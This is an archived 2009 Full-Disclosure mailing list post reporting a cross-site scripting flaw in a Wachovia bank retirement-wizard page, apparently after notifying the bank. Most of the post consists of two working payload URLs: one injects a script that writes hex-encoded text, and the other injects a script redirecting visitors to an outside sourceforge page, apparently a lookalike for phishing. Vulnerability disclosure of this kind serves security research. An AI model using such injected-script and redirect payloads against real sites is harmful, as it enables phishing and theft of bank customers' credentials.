[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Wachovia Banking Wizard - XSS - PoC

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Wachovia Banking Wizard - XSS - PoC
From: Marshall Whittaker <marshallwhittaker@xxxxxxxxx>
Date: Sun, 30 Aug 2009 08:33:09 -0500

This is only a proof of concept, please use this responsibly.
This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 30
2009.

Very simple standard cross site scripting exploit.  As you can see, it works
with HEX as well.  Bad characters obviously arn't filtered correctly.

https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=
><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script
%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html
";%3B</script>

--oxagast

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] windows future
Next by Date: Re: [Full-disclosure] Why the censorship?
Previous by thread: Re: [Full-disclosure] Why the censorship?
Next by thread: [Full-disclosure] Chicken soup for the suspects soul.
Index(es):
- Date
- Thread